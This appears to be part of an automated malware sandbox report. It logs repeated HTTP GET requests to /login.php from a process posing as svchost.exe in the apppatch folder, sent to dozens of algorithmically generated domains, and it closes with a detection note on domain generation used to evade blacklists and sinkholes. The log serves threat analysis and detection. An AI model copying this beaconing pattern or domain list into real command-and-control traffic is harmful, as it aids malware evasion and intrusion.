Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygyvuj.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyhiz.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Content-Length: 6 Cookie: btst=aa122ab46703e7e3b9d2518b0ebc8c78\|8.46.123.33\|1724431621\|1724431621\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Content-Length: 6 Cookie: btst=3e0cadd8e2dc2fdcf92b9c2073c70c58\|8.46.123.33\|1724431621\|1724431621\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyfyj.com Content-Length: 6 Cookie: sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Content-Length: 6 Cookie: vsid=926vr471977221402211128 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Content-Length: 6 Cookie: btst=ee59b14dfaa9c8907c706ea22e956ef8\|8.46.123.33\|1724431621\|1724431621\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Content-Length: 6 Cookie: btst=162891e75d1d854fb9d05e52998b5935\|8.46.123.33\|1724431621\|1724431621\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupycag.com Content-Length: 6 Cookie: btst=0e9c6b135bbf78b20bee3c60ff917523\|8.46.123.33\|1724431636\|1724431636\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyciz.com Content-Length: 6 Cookie: btst=e67e5bdc7da6809b4e043748c6ce58a1\|8.46.123.33\|1724431658\|1724431658\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qexyhuv.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galynuh.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com Content-Length: 6 Cookie: __tad=1724431658.5743798 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com Content-Length: 6 Cookie: __tad=1724431658.5024510 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php?sub1=20240824-0248-364a-9808-e6df4ec839e7 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1724431658.5743798 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php?subid1=20240824-0248-365f-be38-e61788a8e181 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1724431658.5024510 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qexyhuv.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyhyg.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygyvuj.com Content-Length: 6 Cookie: btst=230ba644e827e5eb69b76dd744835699\|8.46.123.33\|1724431667\|1724431667\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyhiz.com Content-Length: 6 Cookie: btst=61afe5b7d011093f87c495eec767f391\|8.46.123.33\|1724431669\|1724431669\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Content-Length: 6 Cookie: btst=aa122ab46703e7e3b9d2518b0ebc8c78\|8.46.123.33\|1724431671\|1724431621\|25\|2\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Content-Length: 6 Cookie: btst=ee59b14dfaa9c8907c706ea22e956ef8\|8.46.123.33\|1724431672\|1724431621\|25\|2\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Content-Length: 6 Cookie: vsid=926vr471977221402211128 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Content-Length: 6 Cookie: btst=3e0cadd8e2dc2fdcf92b9c2073c70c58\|8.46.123.33\|1724431671\|1724431621\|25\|2\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Content-Length: 6 Cookie: btst=162891e75d1d854fb9d05e52998b5935\|8.46.123.33\|1724431672\|1724431621\|25\|2\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyfyj.com Content-Length: 6 Cookie: sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Queries random domain names (often used to prevent blacklisting and sinkholes)

Source: unknown

